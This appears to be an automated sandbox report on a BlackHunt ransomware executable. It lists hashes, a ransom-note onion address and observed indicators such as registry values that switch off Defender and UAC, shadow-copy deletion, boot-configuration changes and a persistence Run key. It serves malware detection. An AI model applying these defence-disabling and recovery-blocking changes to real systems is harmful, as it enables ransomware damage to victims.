Analysis
-
max time kernel
164s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 01:24
Static task
static1
Behavioral task
behavioral1
Sample
f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe
Resource
win10v2004-20231215-en
General
-
Target
f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe
-
Size
707KB
-
MD5
a9e8f79689c24f766e271396f15096ca
-
SHA1
58167008dbd54e7a51dcb75ffa3350df27b7bb81
-
SHA256
f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b
-
SHA512
7d59bbb65822279f3af765100c9f58f18c40a7319f7017809d08ed73314f17ff00bdbe67b2cba6eefcb0eb063b27717bb94abec4e52008f2a5b5e99d161a908b
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1j8Cvnh:6uaTmkZJ+naie5OTamgEoKxLWaMh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 732 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2760 bcdedit.exe 2688 bcdedit.exe -
Renames multiple (2384) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 3032 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\E: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\T: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\Y: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\I: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\O: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\K: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\V: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\U: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\G: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\Z: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\X: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\M: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\S: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\L: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\B: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\J: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\Q: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\R: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\P: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\H: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened (read-only) \??\N: f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chicago f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\#BlackHunt_Private.key f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_ja.jar f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.shell_0.10.0.v201212101605.jar f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_zh_4.4.0.v20140623020002.jar f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#BlackHunt_Private.key f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mexico_City f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\#BlackHunt_Private.key f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-spi-actions.xml_hidden f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Urumqi f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.commands_5.5.0.165303.jar f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_VideoInset.png f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+8 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\rjmx.jar f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jre7\lib\currency.data f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyrun.jar f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wake f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-progress-ui.jar f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\#BlackHunt_Private.key f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#BlackHunt_Private.key f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaSansRegular.ttf f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mahe f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jre7\#BlackHunt_ReadMe.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Los_Angeles f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG_PAL.wmv f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\#BlackHunt_ReadMe.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\#BlackHunt_Private.key f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-spi-actions.xml f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Salta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santa_Isabel f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Goose_Bay f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.ui_1.1.200.v20130626-2037.jar f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jdk1.7.0_80\#BlackHunt_ReadMe.hta f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\EST5 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Godthab f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe File created C:\Program Files\Java\jre7\lib\fonts\#BlackHunt_ReadMe.txt f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3068 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 980 vssadmin.exe 2068 vssadmin.exe 1108 vssadmin.exe 1712 vssadmin.exe 2580 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ schtasks.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 schtasks.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Token: SeRestorePrivilege 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Token: SeBackupPrivilege 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Token: SeTakeOwnershipPrivilege 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Token: SeAuditPrivilege 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Token: SeSecurityPrivilege 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Token: SeIncBasePriorityPrivilege 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Token: SeBackupPrivilege 2820 vssvc.exe Token: SeRestorePrivilege 2820 vssvc.exe Token: SeAuditPrivilege 2820 vssvc.exe Token: SeBackupPrivilege 1072 wbengine.exe Token: SeRestorePrivilege 1072 wbengine.exe Token: SeSecurityPrivilege 1072 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2680 wrote to memory of 1956 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 30 PID 2680 wrote to memory of 1956 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 30 PID 2680 wrote to memory of 1956 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 30 PID 2680 wrote to memory of 1956 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 30 PID 2680 wrote to memory of 2044 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 32 PID 2680 wrote to memory of 2044 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 32 PID 2680 wrote to memory of 2044 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 32 PID 2680 wrote to memory of 2044 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 32 PID 2680 wrote to memory of 2556 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 34 PID 2680 wrote to memory of 2556 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 34 PID 2680 wrote to memory of 2556 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 34 PID 2680 wrote to memory of 2556 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 34 PID 1956 wrote to memory of 2668 1956 cmd.exe 36 PID 1956 wrote to memory of 2668 1956 cmd.exe 36 PID 1956 wrote to memory of 2668 1956 cmd.exe 36 PID 2680 wrote to memory of 2856 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 37 PID 2680 wrote to memory of 2856 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 37 PID 2680 wrote to memory of 2856 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 37 PID 2680 wrote to memory of 2856 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 37 PID 2680 wrote to memory of 2940 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 39 PID 2680 wrote to memory of 2940 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 39 PID 2680 wrote to memory of 2940 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 39 PID 2680 wrote to memory of 2940 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 39 PID 2044 wrote to memory of 2880 2044 reg.exe 41 PID 2044 wrote to memory of 2880 2044 reg.exe 41 PID 2044 wrote to memory of 2880 2044 reg.exe 41 PID 2556 wrote to memory of 3068 2556 cmd.exe 139 PID 2556 wrote to memory of 3068 2556 cmd.exe 139 PID 2556 wrote to memory of 3068 2556 cmd.exe 139 PID 2680 wrote to memory of 2688 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 43 PID 2680 wrote to memory of 2688 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 43 PID 2680 wrote to memory of 2688 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 43 PID 2680 wrote to memory of 2688 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 43 PID 2680 wrote to memory of 2716 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 45 PID 2680 wrote to memory of 2716 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 45 PID 2680 wrote to memory of 2716 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 45 PID 2680 wrote to memory of 2716 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 45 PID 2680 wrote to memory of 2820 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 47 PID 2680 wrote to memory of 2820 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 47 PID 2680 wrote to memory of 2820 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 47 PID 2680 wrote to memory of 2820 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 47 PID 2680 wrote to memory of 2560 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 49 PID 2680 wrote to memory of 2560 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 49 PID 2680 wrote to memory of 2560 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 49 PID 2680 wrote to memory of 2560 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 49 PID 2680 wrote to memory of 2624 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 51 PID 2680 wrote to memory of 2624 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 51 PID 2680 wrote to memory of 2624 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 51 PID 2680 wrote to memory of 2624 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 51 PID 2680 wrote to memory of 2608 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 54 PID 2680 wrote to memory of 2608 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 54 PID 2680 wrote to memory of 2608 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 54 PID 2680 wrote to memory of 2608 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 54 PID 2680 wrote to memory of 3040 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 55 PID 2680 wrote to memory of 3040 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 55 PID 2680 wrote to memory of 3040 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 55 PID 2680 wrote to memory of 3040 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 55 PID 2680 wrote to memory of 2532 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 57 PID 2680 wrote to memory of 2532 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 57 PID 2680 wrote to memory of 2532 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 57 PID 2680 wrote to memory of 2532 2680 f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe 57 PID 2856 wrote to memory of 656 2856 cmd.exe 58 PID 2856 wrote to memory of 656 2856 cmd.exe 58 PID 2856 wrote to memory of 656 2856 cmd.exe 58 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe"C:\Users\Admin\AppData\Local\Temp\f3053eb5b607321dae5d6757fba329f9386f8c604c78e44f5029dfde8d22231b.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2680 -
